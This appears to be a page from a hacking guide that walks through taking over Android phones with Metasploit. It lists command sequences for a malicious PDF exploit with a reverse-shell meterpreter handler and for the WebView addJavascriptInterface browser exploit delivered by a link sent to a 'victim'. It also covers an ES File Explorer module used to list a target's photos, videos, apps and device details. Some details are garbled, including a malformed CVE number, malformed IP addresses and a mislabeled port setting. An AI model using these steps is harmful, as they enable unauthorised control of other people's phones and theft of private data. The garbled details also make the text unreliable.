Exploiting Android Vulnerabilities Using Metasploit | Hacking Android Phone by Metasploit Framework | How to Hack Android Mobile

 We know that mostly people use android so, now we will learn that how to exploit different vulnerabilities of android system by using different exploits of Metasploit;

(msfconsole)

(use exploit/android/fileformat/adobe_recoder_pdf_js_interface)

Then send (msf.pdf) file to target and as victim will run this file you can get meterpreter shell by using following commands;

(use exploit/multi/handler)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD windows/meterpreter/reverse_tcp)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(set LPORT + port to control) e.g. (set LPORT 4444)

(exploit)

PAGE 250

(sessions -i 1)

Now you can control android of your victim.

1)      EXPLOITING WEB VIEW ADD JAVASCRIPT INTERFACE VULNERABILITY:

(msfconsole)

(use exploit/android/browser/webview_addjavascriptinterface)

(show payloads)

(set PAYLOAD + payload to control) e.g. (set PAYLOAD generic/shell/reverse_tcp)

(show options)

(set LHOST + ip of kali Linux) e.g. (set LHOST 192.168.8.4.)

(set SRVHOST + ip of kali Linux) e.g. (set SRVHOST 192.168.0.21)

(set SRVPORT + port to control) e.g. (set SRVHOST 80)

(set URIPATH + path to control) e.g. (set URIPATH)

(exploit)

The send link to victim and as victim will click on the link. You will get the generic shell to control the android of victim.

2)      EXPLOITING, VULNERABILITY IN ES FILE EXPLORER OF ANDROID (CVE-219-6447):

We can exploit it by using following commands in Metasploit;

(msfconsole)

(use auxiliary/scanner/http/es_file_explorer_open_port)

(show options)

(set RHOSTS + ip of target) e.g. (set RHOSTS 192.168.8.4.)

(run)

Now you can get the detail of target android by using different commands as;

TO SEE LIST OF HELP:

(show options)

TO SEE THE LIST OF PICTURES:

(set action LISTPICS)

(run)

TO SEE THE INSTALLED APPS OF YOUR TARGET ANDROID:

(set action LISTAPPS)

(run)

TO SEE THE LIST OF VEDIO:

(set action LISTVIDEOS)

(run)

TO SEE THE LIST OF AUDIOS)

(set action LISTAUDIOS)

(run)

TO SEE THE DETAIL OF MOBILE:

(set action GETDEVICEINFO)

(run)

You can get more details by using more options by using this module. It is very helpful to you.